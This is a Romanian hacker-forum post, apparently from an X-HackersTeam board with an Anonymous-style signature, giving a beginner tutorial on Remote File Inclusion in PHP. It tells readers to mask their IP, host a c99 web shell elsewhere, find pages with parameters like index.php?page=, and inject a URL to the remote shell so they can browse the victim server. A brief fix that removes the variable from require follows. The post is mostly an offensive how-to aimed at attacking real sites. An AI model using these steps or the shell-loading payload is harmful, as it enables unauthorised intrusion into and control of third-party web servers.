Simpatie.ro - matrimoniale
Ne-am mutat pe xhackers.4umer.com
Ne-am mutat pe xhackers.4umer.com
Nou pe simpatie:
crazygirl
Femeie
24 ani
Buzau
cauta Barbat
26 - 80 ani
Ne-am mutat pe xhackers.4umer.comReguliInregistrareLoginPozeNu sunteti logat. Lista Forumurilor Pe Tematici
Ne-am mutat pe xhackers.4umer.com / Tutoriale /

[Rfi]Tutorial

Pagini: 1 Moderat de Bloody
#1
ß®£αK£®™
Administrator
Postari: 311
Este o metoda foarte cunoscuta , dar am facut acest tutorial pentru a intelege orice incepator din acest domeniu .

..::RFI - Remote File Inclusion::..
===================================
In primul rand avem nevoie de :
1.Un hide ip - recomand aol. Pentru a vedea daca ip-ul real a fost "inlocuit" folositi http://whatismyip.org/
2.Un site unde sa avem urcat shellul. ( recomand c99 , este mai usor de navigat )
===================================
Aceasta vulnerabilitate afecteaza index.php .
In index.php vulnerabilitate este urmatoarea:
" require($page . “pagina.php”); "
Exemplu:
Avem siteul urmator:
http://test.com/index.php , pentru a gasi "RFI-ul" va trebui sa ne uitam in sursa paginii . Click dreapta - View Page Source , apasam Ctrl+F si cautam ceva de genu : index.php?
Sa zicem ca am gasit index.php?page=2. Pentru a testa daca siteul este vulnerabil vom reforumula link-ul , exemplu : http://test.com/index.php?page=http://s ... ro/c99.txt? - Press Enter Posted Image
Daca siteul nostru test.com este vulnerabil vom putea naviga prin directoarele dupa server .
====================================
Cum "reparam" aceasta vulnerabilitate ?

Cum am spus si mai sus : in index.php vulnerabilitatea este : require($page. "pagina.php");
Pentru a repara bugul va trebui sa stergem "$page." , exemplu :
require("pagina.php");
=====================================


_______________________________________
We are Anonymous!
We are legion!
Wait for us!
We X-HackersTeam!
We have the power!
We want respect!
X-HackersTeam is Anonymous
EXPECT US !



 
   
Pagini: 1  
Mergi la